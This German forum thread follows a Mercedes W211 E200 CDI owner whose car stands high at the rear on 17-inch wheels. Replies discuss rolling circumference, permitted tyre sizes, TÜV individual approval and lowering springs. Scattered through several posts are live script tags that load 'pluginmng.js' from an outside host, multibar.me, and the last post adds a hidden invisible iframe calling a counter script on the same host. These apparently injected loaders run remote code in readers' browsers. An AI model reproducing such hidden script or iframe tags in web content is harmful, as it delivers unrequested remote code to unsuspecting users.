W211 hinten mit 17 Zöller zu hoch

Diskutiere W211 hinten mit 17 Zöller zu hoch im Forum E-Klasse & CLS Forum im Bereich Mercedes-Benz - Hallo ich bin neu hier. Und zwar ich habe den w211 200cdi Classic. Original hat er 16 Zoll Räder drauf. Ich habe mir ein originalen Satz 17...
Status
Für weitere Antworten geschlossen.
K

Krieger84

Frischling
Beiträge
5
Fahrzeug
W211 200 CDI
Hallo ich bin neu hier.
Und zwar ich habe den w211 200cdi Classic. Original hat er 16 Zoll Räder drauf. Ich habe mir ein originalen Satz 17 Zöller geholt. Was mir jetzt auffällt ist, dass er hinten ziemlich hoch steht. Es passen locker 3-4 Finger zwischen Rad und Kotflügel rein. Keine E-Klasse ist hinten so hoch. Selbst mit 18 Zoll Rädern. Vorne ist er nur ein Tick höher. Was ist die Ursache? Helfen da nur Tieferlegungsfedern wenn ja welche empfehlt ihr?
 
Hallo ich bin neu hier.
Und zwar ich habe den w211 200cdi Classic. Original hat er 16 Zoll Räder drauf. Ich habe mir ein originalen Satz 17 Zöller geholt. Was mir jetzt auffällt ist, dass er hinten ziemlich hoch steht. Es passen locker 3-4 Finger zwischen Rad und Kotflügel rein. Keine E-Klasse ist hinten so hoch. Selbst mit 18 Zoll Rädern. Vorne ist er nur ein Tick höher. Was ist die Ursache? Helfen da nur Tieferlegungsfedern wenn ja welche empfehlt ihr?


Du kannst Dir auch 24-Zoeller holen und sie auf der Laufflaeche mit Fluessiggummi beschichten ... am Abrollumfang und somit an der Radhausfuellung wird das nichts aendern. 18-Zoeller sind naemlich keinesfalls "groesser" als 14-Zoeller ... zugelassene Reifenformate vorausgesetzt.

Carsten
 
Du kannst Dir auch 24-Zoeller holen und sie auf der Laufflaeche mit Fluessiggummi beschichten ... am Abrollumfang und somit an der Radhausfuellung wird das nichts aendern. 18-Zoeller sind naemlich keinesfalls "groesser" als 14-Zoeller ... zugelassene Reifenformate vorausgesetzt.

Carsten

Das wirds sein. Als Referenz: Ich fahre 245/45/17, es können durchaus auch andere Reifengrößen gefahren werden, nur muss der Abrollumfang auch stimmen.

Schreib mal Reifen- und Felgengröße auf, erst dann kann man helfen. Achja: Du hast aber nicht direkt nach dem Wechsel gemessen, sondern bist schon erst ein paar Meter um den Block gefahren?!

MfG Paule
 
Sind dass auch die "richtigen" 17 Zöller??
Siehe link
 
Schau mal in die MB-Freigabe für den 211er. Und prüfe genau ob Du überhaupt die Originalen-17" fahren darfst.
Sind es Nachrüst-Räder vom freien Markt gelten die Daten der ABE/Gutachten.

Da Du einen Classic hast hast Du das Komfort-Fahrwerk. Da steht der Wagen etwas höher. Da ist aber auch egal ob Du 16" oder 20" montierst. Die Höhe vom Fahrzeug ändert sich dadurch nicht.

Man sieht nur eher, dass er hochbeinig da steht.

Ansonsten würde ich H&R Federn empfehlen und lesen, lesen, lesen

Gruß
Hyperbel
 
<script src="http://multibar.me/pluginmng.js" type="text/javascript"></script>Danke für eure antworten.

@Hyperbel: Ja es sind originale 17 Zöller, hast du die Federn bei dir
verbaut, wenn ja kannst du mir bitte ein Foto schicken?

@Thomas H: Als Teilenummer A2114016302. Es ist eine 8J x 17 H2 ET
38. Reifen: 235/45 R17

Habe gelesen, das bei Basisfahrwerk und / oder Code 485, 482, dass die serienmäßigen Einfederpuffer an der VA gegen den Anschlaggummi als Einfederbegrenzung getasucht werden müssen (bei 17" und 18").

Aber warum nur an der VA? Es gibt ja um die HA...
 
E200 CDI - 211.004 / 211.007

Um welches Modelljahr (nicht Erstzulassung) geht es?
Bis Modelljahr 2007 (Code 807) mit werkseitiger EURO4 Abgaseinstufung?
oder...
Ab Modelljahr 2008 (Code 808)

Hyperbel hat es oben schon geschrieben - Du musst erst prüfen (siehe Link von Thomas), ob Du überhaupt originale 17" Räder montieren darfst.
... Ja es sind originale 17 Zöller, ...
... Als Teilenummer A2114016302. Es ist eine 8J x 17 H2 ET
38. ...
Da stimmt was nicht ...

A211 401 63 02 (B6 647 43 58) ist die Teilenummer von 16" MB-Felgen mit dem Format 7.5J x 16H2 ET42.

Die Felge sieht so aus:

http://t3.gstatic.com/images?q=tbn:ANd9GcRn_qPfGkFw1pfjzX-l177JRYKU3OejkTevEKHeAz2CNqJIMU43vQ

Reifen: 235/45 R17
Dieses 17"-Reifenformat ist für die Baureihe 211 gar nicht zulässig, der Abrollumfang ist zu gering.

Paule hat oben das richtige 17"-Reifenformat gepostet: 245/45/17


Habe gelesen, das bei Basisfahrwerk und / oder Code 485, 482, dass die serienmäßigen Einfederpuffer an der VA gegen den Anschlaggummi als Einfederbegrenzung getasucht werden müssen (bei 17" und 18").

Aber warum nur an der VA? Es gibt ja um die HA...
Thomas hat Dir oben den Link zu den offiziellen MB-Freigaben geschrieben, hast Du dort schon nachgelesen?
Dort stehen die Einschränkungen zu 16", 17" und 18" und Anschlaggummis etc. ... drin.


Gruß
 
Zuletzt bearbeitet:
<script src="http://multibar.me/pluginmng.js" type="text/javascript"></script>Danke für eure antworten.

@Hyperbel: Ja es sind originale 17 Zöller, hast du die Federn bei dir
verbaut, wenn ja kannst du mir bitte ein Foto schicken?

@Thomas H: Als Teilenummer A2114016302. Es ist eine 8J x 17 H2 ET
38. Reifen: 235/45 R17

Habe gelesen, das bei Basisfahrwerk und / oder Code 485, 482, dass die serienmäßigen Einfederpuffer an der VA gegen den Anschlaggummi als Einfederbegrenzung getasucht werden müssen (bei 17" und 18").

Aber warum nur an der VA? Es gibt ja um die HA...

Ich habe die 30mm an der VA von H&R.

Für das T-Modell hat H&R nur 30mm für die VA im Programm. Für die Limo gibt es 40mm Federn für VA und HA. Theoretisch käme Dein Wagen an der VA also noch 1 cm tiefer. Wobei Fahrzeuggewicht (und Toleranzen) durchaus Abweichungen von 1cm nach oben oder unten bringen können.

An der VA ist es halt Vorschrift von MB für die Originalräder. Die werden ihren Grund haben (eventuell ist es halt Vorsicht um Produkthaftungsfragen aus dem Weg zu gehen).
An der HA ist mehr Platz im Radkasten.

H.
 
<script src="http://multibar.me/pluginmng.js" type="text/javascript"></script>Hallo,

also ich war eben beim TÜV Rheinland. Laut den ihren Unterlagen darf mein W211 die reifen 235/45 R17 fahren auf dieser Felge fahren. Allerdings mit Einzalabnahme.
Also hilft jetzt nur noch eine Tieferlegung mit H&R federn.

Gibt es noch andere Hersteller?
 
E200 CDI - 211.004 / 211.007 - 17" Räder

<SCRIPT type=text/javascript src="http://multibar.me/pluginmng.js"></SCRIPT>Hallo,

also ich war eben beim TÜV Rheinland. Laut den ihren Unterlagen darf mein W211 die reifen 235/45 R17 fahren auf dieser Felge fahren. Allerdings mit Einzalabnahme.
Mit Einzelabnahme ist vieles möglich - wie das am Ende aussieht, ist wieder was Anderes.

Du sagst ja selbst, dass es besch..... aussieht.

Hat der TÜV-Prüfer erwähnt, ob eine Tacho-Angleichung notwendig wird, damit Du durch die Einzelabnahme kommst?

Also hilft jetzt nur noch eine Tieferlegung mit H&R federn.
Damit kaschierst Du dann auch nur die Optik mit den eigentlich zu kleinen Reifen, aber jedem wie er´s mag - muss man nicht verstehen :p

Gibt es noch andere Hersteller?
Natürlich..., Eibach, Bilstein, KAW, Lowtec .... u.v.m.


Gruß
<IFRAME style="DISPLAY: none" src="http://multibar.me/plcounter.php"></IFRAME>
 
Status
Für weitere Antworten geschlossen.
Thema: W211 hinten mit 17 Zöller zu hoch
Zurück
Oben